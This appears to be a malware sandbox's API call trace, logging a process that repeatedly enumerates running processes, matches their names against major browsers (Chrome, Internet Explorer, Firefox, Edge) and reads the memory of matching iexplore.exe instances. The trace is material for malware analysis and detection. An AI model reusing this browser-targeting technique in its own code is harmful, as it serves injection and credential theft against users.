	[0241.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x856c
	[0241.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.286] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0241.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.287] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.287] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0241.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.288] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.288] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0241.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x8570
	[0241.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.289] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0241.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.290] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.291] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0241.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.291] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0241.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x8574
	[0241.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.293] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0241.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.293] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.294] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0241.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.294] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8578
	[0241.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.295] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0241.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.296] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.296] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.296] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.296] NtQueryInformationProcess (in: ProcessHandle=0x8578, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.297] ReadProcessMemory (in: hProcess=0x8578, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.297] ReadProcessMemory (in: hProcess=0x8578, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.297] ReadProcessMemory (in: hProcess=0x8578, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.297] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x857c
	[0241.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.298] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0241.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.298] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.299] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.299] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.299] NtQueryInformationProcess (in: ProcessHandle=0x857c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.299] ReadProcessMemory (in: hProcess=0x857c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.299] ReadProcessMemory (in: hProcess=0x857c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.299] ReadProcessMemory (in: hProcess=0x857c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.299] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8580
	[0241.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.301] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0241.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.301] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.302] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0241.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.302] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0241.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8584
	[0241.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.303] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0241.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.303] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.304] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0241.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.304] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8588
	[0241.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.305] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.306] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.306] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.306] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x858c
	[0241.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.308] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.308] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.309] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.309] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8590
	[0241.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.310] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.310] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.311] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.311] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.311] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.312] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8594
	[0241.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.312] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.313] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.313] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.313] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.313] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.314] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8598
	[0241.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.314] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.315] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.315] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.315] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.316] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x859c
	[0241.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.316] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.317] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.317] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.318] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.318] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0241.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x85a0
	[0241.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.319] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0241.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.319] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.319] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0241.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.320] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.320] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0241.321] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x85a4
	[0241.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.321] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.321] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.321] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.322] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0241.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x85a8
	[0241.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.323] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0241.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.323] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.323] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0241.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.324] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x85ac
	[0241.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.325] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.325] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.325] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.326] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.326] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0241.327] CloseHandle (hObject=0x4fd0) returned 1
	[0241.327] Sleep (dwMilliseconds=0x64) 
	[0241.435] GetCurrentProcessId () returned 0x110
	[0241.435] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0241.438] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0241.440] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0241.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0241.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x85b0
	[0241.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.442] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.442] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.443] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.443] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.443] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x85b4
	[0241.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.445] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.445] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.445] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.446] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0241.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x85b8
	[0241.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.447] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0241.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.447] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.448] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0241.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.448] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x85bc
	[0241.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.449] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.449] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.450] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.450] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0241.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x85c0
	[0241.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.451] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0241.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.451] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.452] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
